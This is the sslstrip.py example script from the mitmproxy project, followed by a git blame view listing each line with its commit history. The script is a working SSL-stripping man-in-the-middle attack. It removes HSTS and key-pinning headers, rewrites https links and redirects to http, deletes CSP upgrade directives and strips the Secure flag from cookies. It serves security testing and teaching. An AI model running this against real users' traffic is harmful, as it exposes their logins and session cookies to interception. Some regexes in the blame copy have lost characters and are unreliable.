mitmproxy/examples/sslstrip.py

import re
from six.moves import urllib

# set of SSL/TLS capable hosts
secure_hosts = set()


def request(flow):
    flow.request.headers.pop('If-Modified-Since', None)
    flow.request.headers.pop('Cache-Control', None)

    # do not force https redirection
    flow.request.headers.pop('Upgrade-Insecure-Requests', None)

    # proxy connections to SSL-enabled hosts
    if flow.request.pretty_host in secure_hosts:
        flow.request.scheme = 'https'
        flow.request.port = 443


def response(flow):
    flow.response.headers.pop('Strict-Transport-Security', None)
    flow.response.headers.pop('Public-Key-Pins', None)

    # strip links in response body
    flow.response.content = flow.response.content.replace('https://', 'http://')

    # strip meta tag upgrade-insecure-requests in response body
    csp_meta_tag_pattern = b'<meta.*http-equiv=["\']Content-Security-Policy[\'"].*upgrade-insecure-requests.*?>'
    flow.response.content = re.sub(csp_meta_tag_pattern, b'', flow.response.content, flags=re.IGNORECASE)

    # strip links in 'Location' header
    if flow.response.headers.get('Location', '').startswith('https://'):
        location = flow.response.headers['Location']
        hostname = urllib.parse.urlparse(location).hostname
        if hostname:
            secure_hosts.add(hostname)
        flow.response.headers['Location'] = location.replace('https://', 'http://', 1)

    # strip upgrade-insecure-requests in Content-Security-Policy header
    if re.search('upgrade-insecure-requests', flow.response.headers.get('Content-Security-Policy', ''), flags=re.IGNORECASE):
        csp = flow.response.headers['Content-Security-Policy']
        flow.response.headers['Content-Security-Policy'] = re.sub('upgrade-insecure-requests[;\s]*', '', csp, flags=re.IGNORECASE)

    # strip secure flag from 'Set-Cookie' headers
    cookies = flow.response.headers.get_all('Set-Cookie')
    cookies = [re.sub(r';\s*secure\s*', '', s) for s in cookies]
    flow.response.headers.set_all('Set-Cookie', cookies)
added sslstrip to inline script examples 2016-01-12 16:41:41 +00:00			`import re`
			`from six.moves import urllib`

remove context from all scripts 2016-07-08 01:37:33 +00:00			`# set of SSL/TLS capable hosts`
			`secure_hosts = set()`
added sslstrip to inline script examples 2016-01-12 16:41:41 +00:00

remove context from all scripts 2016-07-08 01:37:33 +00:00			`def request(flow):`
added sslstrip to inline script examples 2016-01-12 16:41:41 +00:00			`flow.request.headers.pop('If-Modified-Since', None)`
			`flow.request.headers.pop('Cache-Control', None)`

Fixes - #1555 sslstrip.py flow.response.headers (#1556) * Fixes - #1555 sslstrip.py flow.response.headers * #1557 - add enhancements in inline script sslstrip.py with upgrade-insecure-requests stripping * #1557 - update to match python style guide * #1555, #1556, update to a bytes pattern 2016-09-26 02:29:26 +00:00			`# do not force https redirection`
			`flow.request.headers.pop('Upgrade-Insecure-Requests', None)`

format examples 2016-05-29 08:23:39 +00:00			`# proxy connections to SSL-enabled hosts`
remove context from all scripts 2016-07-08 01:37:33 +00:00			`if flow.request.pretty_host in secure_hosts:`
added sslstrip to inline script examples 2016-01-12 16:41:41 +00:00			`flow.request.scheme = 'https'`
			`flow.request.port = 443`


remove context from all scripts 2016-07-08 01:37:33 +00:00			`def response(flow):`
Fixes - #1555 sslstrip.py flow.response.headers (#1556) * Fixes - #1555 sslstrip.py flow.response.headers * #1557 - add enhancements in inline script sslstrip.py with upgrade-insecure-requests stripping * #1557 - update to match python style guide * #1555, #1556, update to a bytes pattern 2016-09-26 02:29:26 +00:00			`flow.response.headers.pop('Strict-Transport-Security', None)`
			`flow.response.headers.pop('Public-Key-Pins', None)`
update examples: no decoded() anymore :tada: 2016-07-02 09:01:46 +00:00
			`# strip links in response body`
			`flow.response.content = flow.response.content.replace('https://', 'http://')`

Fixes - #1555 sslstrip.py flow.response.headers (#1556) * Fixes - #1555 sslstrip.py flow.response.headers * #1557 - add enhancements in inline script sslstrip.py with upgrade-insecure-requests stripping * #1557 - update to match python style guide * #1555, #1556, update to a bytes pattern 2016-09-26 02:29:26 +00:00			`# strip meta tag upgrade-insecure-requests in response body`
			`csp_meta_tag_pattern = b'<meta.http-equiv=["\']Content-Security-Policy[\'"].upgrade-insecure-requests.*?>'`
			`flow.response.content = re.sub(csp_meta_tag_pattern, b'', flow.response.content, flags=re.IGNORECASE)`

update examples: no decoded() anymore :tada: 2016-07-02 09:01:46 +00:00			`# strip links in 'Location' header`
			`if flow.response.headers.get('Location', '').startswith('https://'):`
			`location = flow.response.headers['Location']`
			`hostname = urllib.parse.urlparse(location).hostname`
			`if hostname:`
Merge remote-tracking branch 'origin/master' into message-body-encoding 2016-07-16 06:17:57 +00:00			`secure_hosts.add(hostname)`
update examples: no decoded() anymore :tada: 2016-07-02 09:01:46 +00:00			`flow.response.headers['Location'] = location.replace('https://', 'http://', 1)`

Fixes - #1555 sslstrip.py flow.response.headers (#1556) * Fixes - #1555 sslstrip.py flow.response.headers * #1557 - add enhancements in inline script sslstrip.py with upgrade-insecure-requests stripping * #1557 - update to match python style guide * #1555, #1556, update to a bytes pattern 2016-09-26 02:29:26 +00:00			`# strip upgrade-insecure-requests in Content-Security-Policy header`
			`if re.search('upgrade-insecure-requests', flow.response.headers.get('Content-Security-Policy', ''), flags=re.IGNORECASE):`
			`csp = flow.response.headers['Content-Security-Policy']`
			`flow.response.headers['Content-Security-Policy'] = re.sub('upgrade-insecure-requests[;\s]*', '', csp, flags=re.IGNORECASE)`

update examples: no decoded() anymore :tada: 2016-07-02 09:01:46 +00:00			`# strip secure flag from 'Set-Cookie' headers`
			`cookies = flow.response.headers.get_all('Set-Cookie')`
			`cookies = [re.sub(r';\ssecure\s', '', s) for s in cookies]`
			`flow.response.headers.set_all('Set-Cookie', cookies)`